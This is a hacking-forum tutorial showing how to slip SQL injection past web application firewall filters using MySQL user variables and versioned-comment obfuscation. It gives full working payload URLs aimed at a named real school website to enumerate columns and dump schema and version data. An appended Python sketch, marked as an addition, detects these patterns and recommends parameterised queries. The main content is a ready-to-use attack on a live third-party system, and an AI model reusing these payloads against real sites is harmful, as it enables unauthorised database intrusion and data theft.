// Posted by: Unknown
// On: Monday, 13 February 2017
Hello friends,
Today we will discuss how to bypass hard WAF filters with a local variable. When the regular formats for dumping data are not working, this is the best alternative to try for bypassing hard filters, though it won't work every time.
OK, let's start.
I'll explain it on a live site,
site>> http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=8
and I got the vulnerable columns
http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,3,4--+
and let's dump tables and columns
http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),4--+
result >> 403 forbidden
We have tried all the ways to bypass the WAF but they didn't work; now let's try with a local variable.
A local variable is simply a value holder (in MySQL this is a user-defined variable, written with a leading @): it holds a certain value and gives it as output when the command is executed. So let's see it practically.
In the query below I opened a variable named "sqli" and stored a value in it, then placed that variable in the vulnerable column, which shows the output when the query is executed.
http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=.8' and @sqli:=(seLeCt concat/**/(version())) /*!50000UNION*/+SELECT+1,2,@sqli,4--+
output
![[Image: vxu1l.png]](https://i68.tinypic.com/vxu1l.png)
Likewise, now let's dump data [tables and columns]
http://www.kantipurinternational.edu.np/....php?id=.8' and @sqli:=(select /*!50000GrOUp_ConCat(0x3c6c693e,/*!50000table_naMe*/,0x20203a3a2020,/*!50000ColuMN_naMe*/) FrOm /*!50000information_schema.columns*/ where table_schema=database/**_**/()) /*!50000UNION*/+SELECT+1,2,@sqli,4--+
and the output
![[Image: 2q8964g.png]](https://i65.tinypic.com/2q8964g.png)
Hope you are clear with this, and that's all for this tutorial.
My next tutorial will be on bypassing hard WAF filters with cookie-based injection.
Please give your feedback about my tutorial.
Thank you.
See ya!
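
Added example (not part of the original post): a detection-side sketch in Python that normalises a request parameter the way MySQL reads it, unwrapping `/*!50000...*/` versioned comments, dropping plain comments and folding case, and then flags the user-variable assignment and UNION SELECT shapes shown above. The function names, rule names and sample strings are constructed for illustration and are not taken from any WAF product.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*!NNNNN ... */ and treats plain /* ... */ as whitespace.
PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)
VERSIONED_OPEN = re.compile(r"/\*!\d*")

# Hypothetical rule names; patterns run on the normalised (lower-cased) text.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("user-variable-assignment", re.compile(r"@\w*\s*:=")),
    ("schema-enumeration", re.compile(r"\binformation_schema\b")),
]

def naive_signature(value):
    """A raw-string signature of the kind that comment wrapping slips past."""
    return re.search(r"union\s+select", unquote_plus(value), re.I)

def normalize(value):
    """Reduce a parameter value to the token stream MySQL would parse."""
    text = unquote_plus(value)             # '+' and %xx decoding
    text = PLAIN_COMMENT.sub(" ", text)    # /**/ and /**_**/ act as separators
    text = VERSIONED_OPEN.sub(" ", text)   # drop the '/*!50000' opener, keep the body
    text = text.replace("*/", " ")         # drop leftover closers (handles nesting)
    return re.sub(r"\s+", " ", text).strip().lower()

def inspect(value):
    """Return the names of all rules that fire for one parameter value."""
    hits = []
    if VERSIONED_OPEN.search(unquote_plus(value)):
        hits.append("versioned-comment")   # rarely legitimate in user input
    norm = normalize(value)
    hits += [name for name, rx in RULES if rx.search(norm)]
    return hits

# Constructed samples: the variable-assignment shape from the post, a shorter
# schema-enumeration shape, and a benign request.
PAGE_SHAPE = ("id=.8' and @sqli:=(seLeCt concat/**/(version())) "
              "/*!50000UNION*/+SELECT+1,2,@sqli,4--+")
CONSTRUCTED = ("id=1+/*!50000UniOn*/+SeLeCt+1,table_name+FrOm+"
               "/*!50000information_schema*/.tables")
BENIGN = "id=8"

if __name__ == "__main__":
    for sample in (BENIGN, PAGE_SHAPE, CONSTRUCTED):
        print(bool(naive_signature(sample)), inspect(sample))
```

Matching after normalisation helps in logs and WAF rules, but the fix for the page itself is a parameterised query for the `id` value, which makes the comment and variable tricks irrelevant.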

source http://forum.sqliwiki.com/showthread.php?tid=4164